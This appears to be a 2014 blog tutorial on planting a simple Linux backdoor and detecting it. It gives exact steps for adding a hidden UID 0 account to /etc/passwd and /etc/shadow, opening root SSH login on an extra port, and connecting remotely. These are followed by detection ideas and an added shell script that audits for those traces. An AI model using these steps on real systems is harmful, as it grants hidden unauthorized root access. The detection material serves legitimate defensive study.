Saturday, 13 December 2014

Hack: Simplest of Backdoors.

Computer System A (Alice).

A backdoor is a piece of software, or a configuration change, that lets someone get into a computer system later while bypassing the normal access controls: a hidden account, a hidden service, a call to a certain function.

Backdoors are left by programmers and attackers so that they can *easily and quickly* regain access to a compromised (or legitimately administered) machine at a later time.

Knowing how a backdoor is planted is a useful skill for any network admin: it is hard to protect a hardware and software infrastructure against data leaks or machine-takeover attempts of this type without knowing what to look for, especially when the checking is combined with a little programming or scripting.

In this tutorial we explain how to leave a backdoor on a Linux system and how to protect against this type of attack.

How do we leave a backdoor on a Linux system?

1. Add a user with an intelligently chosen (inconspicuous) name and UID 0 by editing the /etc/passwd and /etc/shadow files.

to /etc/passwd file we add line:

username:x:0:0::path:shell

- username is the name of the user added
- x means the password hash is kept in /etc/shadow, not here
- the first 0 is the user identifier (UID 0 makes the account root, whatever its name)
- the second 0 is the group identifier (0 is the root group)
- the empty field is the GECOS (comment) field
- path is the user's home directory, for example /root for the root user
- shell is the login shell, for example /bin/bash

for example:

bond:x:0:0::/root:/bin/bash

to /etc/shadow we add line:

username:!:0:0:99999:7:::

- username is the name of the user added
- ! is a placeholder in the password hash field; it keeps the account locked until a real hash is set
- the remaining fields are the day of the last password change, the minimum and maximum password age, the warning period, and the empty inactivity, expiry and reserved fields

for example:

bond:!:0:0:99999:7:::

then we call the passwd username command to finalize the process; it replaces the placeholder with the password hash and updates the last-change day.

for example:
passwd bond

(Editing these files by hand in a plain editor is error-prone and leaves them unlocked while you type; vipw and vipw -s edit /etc/passwd and /etc/shadow under a lock, and the useradd command with its -o option, which allows a non-unique UID, together with -u 0 and -g 0, creates the same entry in one step.)

2. Configure and start the sshd service, which allows remote access to the computer over a secure (encrypted) connection.

we edit the file: /etc/ssh/sshd_config
we modify the line with the PermitRootLogin directive if necessary, to allow root login. sshd applies PermitRootLogin to every account with UID 0, not only to the one named root, so it has to allow the login for the user added above as well.
for example, we can comment the line out with the # character, which leaves sshd's default in force:

# PermitRootLogin no

(on OpenSSH releases before 7.0 the default is yes; from 7.0 on it is prohibit-password, which allows only key-based root logins, so on a newer system PermitRootLogin yes has to be set explicitly.)

we start the sshd service.

depending on the Linux distribution, this command can vary, for example:
/etc/init.d/sshd start
service ssh start
systemctl start ssh (or sshd, depending on the unit name)

we might need to locate the sshd binary or init script with the 'locate sshd' command.

3. Connect remotely to the computer system with the backdoor.

ssh username@ipaddr
ssh username@ipaddr -p port

- username is the name of the user added in the backdoor creation process
- ipaddr is the IP address of the computer system with the backdoor
- port is the port on which that computer's sshd listens (22 by default)

for example:
ssh bond@
ssh bond@ -p 2016

additional ssh port(s) are enabled in the /etc/ssh/sshd_config file by adding line(s):
Port portnumber

- portnumber is the number of a port to listen on. Several Port lines are allowed, but once any Port line is present sshd listens only on the listed ports, so Port 22 must be kept if the normal port should stay open.

for example:
Port 2016

(/etc/ssh/sshd_config is the sshd configuration file; the listen ports are configured there. An extra listening port shows up in any port scan, so it is also one of the easiest traces of this backdoor to find.)

then we need to start or restart the ssh service.

for example:
/etc/init.d/sshd start
service ssh start
/etc/init.d/sshd restart
service ssh restart

4. Checking whether the ssh service is running, and on which ports it listens:

sockstat | grep sshd

the sockstat tool, if not available, can be obtained from the software repository with:

apt-get install sockstat

(this changes the operating system configuration and leaves a trace of tampering, as most commands do, but this one is a serious trace: the package manager records every install in /var/log/dpkg.log and /var/log/apt/history.log).

or we can use the commands:
- ss -tlnp | grep sshd (or netstat -tlnp | grep sshd on older systems), which are normally installed already and need no new package
- service ssh status
- service sshd status
- systemctl status ssh

if none of the above works, keep looking; the service tools differ between distributions.

How do we protect a computer system against this type of backdoor?

for now I have the following ideas:

- manually checking the files regularly (/etc/passwd, /etc/shadow): any account other than root with UID 0 in /etc/passwd, or an unexpected account with a usable password hash in /etc/shadow, is a sign of this backdoor; /etc/ssh/sshd_config should be checked in the same way for extra Port lines and for the PermitRootLogin setting,
- using a grep (or awk) script to automate the above check and to compare the files against a known-good copy, so that a new line stands out,
- using 'hidden' kernel functionality, which is beyond the scope of this tutorial (and which a file-level check like the above cannot see).
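As an added example of the 'grep script' idea (this is not code from the original post): the POSIX shell script below audits passwd, shadow and sshd_config files for the traces the backdoor above leaves, namely a second UID 0 account, an account with a usable password that is not on an allow list, extra Port lines and the PermitRootLogin setting. The file contents are constructed samples that include the bond account from the tutorial, the hash values in them are placeholders, and the allow list of accounts expected to have a password is an assumption made for the demo.

```shell
#!/bin/sh
# Added example, not part of the original tutorial: look for the traces the
# backdoor above leaves in passwd, shadow and sshd_config files.

# Print every login with UID 0 (field 3 of passwd) other than root.
find_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print logins whose shadow password field (field 2) is usable, i.e. not
# locked with "*", "!" or "!!", and that are not in the space-separated
# allow list $2. An empty field is flagged too: it means no password at all.
unexpected_unlocked_accounts() {
    awk -F: -v allow=" $2 " \
        '$2 !~ /^[*!]/ && index(allow, " " $1 " ") == 0 { print $1 }' "$1"
}

# Print every active Port directive in an sshd_config (commented lines are
# skipped because their first word is "#").
sshd_listen_ports() {
    awk '$1 == "Port" { print $2 }' "$1"
}

# Print the last active PermitRootLogin value, or "default" if none is set.
sshd_permit_root_login() {
    v=$(awk '$1 == "PermitRootLogin" { print $2 }' "$1" | tail -n 1)
    echo "${v:-default}"
}

# audit PASSWD SHADOW SSHD_CONFIG ALLOWLIST
# Report findings and return 1 if a backdoor-style account was found.
audit() {
    status=0
    for u in $(find_uid0_accounts "$1"); do
        echo "uid 0 account other than root: $u"
        status=1
    done
    for u in $(unexpected_unlocked_accounts "$2" "$4"); do
        echo "unexpected account with a usable password: $u"
        status=1
    done
    echo "sshd listening ports: $(sshd_listen_ports "$3" | tr '\n' ' ')"
    echo "PermitRootLogin: $(sshd_permit_root_login "$3")"
    return $status
}

# Constructed sample files for a stand-alone run. On a real system point
# audit at /etc/passwd, /etc/shadow and /etc/ssh/sshd_config instead.
sampledir=$(mktemp -d)
cat > "$sampledir/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bond:x:0:0::/root:/bin/bash
EOF
# The hash values below are placeholders, not real crypt(3) output.
cat > "$sampledir/shadow" <<'EOF'
root:$6$constructed$hash1:16417:0:99999:7:::
daemon:*:16417:0:99999:7:::
alice:$6$constructed$hash2:16417:0:99999:7:::
bond:$6$constructed$hash3:16417:0:99999:7:::
EOF
cat > "$sampledir/sshd_config" <<'EOF'
# PermitRootLogin no
Port 22
Port 2016
EOF

# Assumed allow list: accounts that legitimately hold a password on this host.
ALLOWED_PASSWORD_ACCOUNTS="root alice"

audit "$sampledir/passwd" "$sampledir/shadow" "$sampledir/sshd_config" \
      "$ALLOWED_PASSWORD_ACCOUNTS" || echo "audit: suspicious entries found"
```

The sshd_config checks are deliberately simple text matches; sshd keywords are case-insensitive and can come from Include'd files on newer releases, so on a live system `sshd -T` (which prints the effective configuration) is the better source for the Port and PermitRootLogin values. The account checks only see what is in the files, which is exactly the kind of trace a kernel-level hiding mechanism would conceal.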

(to be elaborated if necessary, but I need a little time to think, to do it properly enough).

that's all.

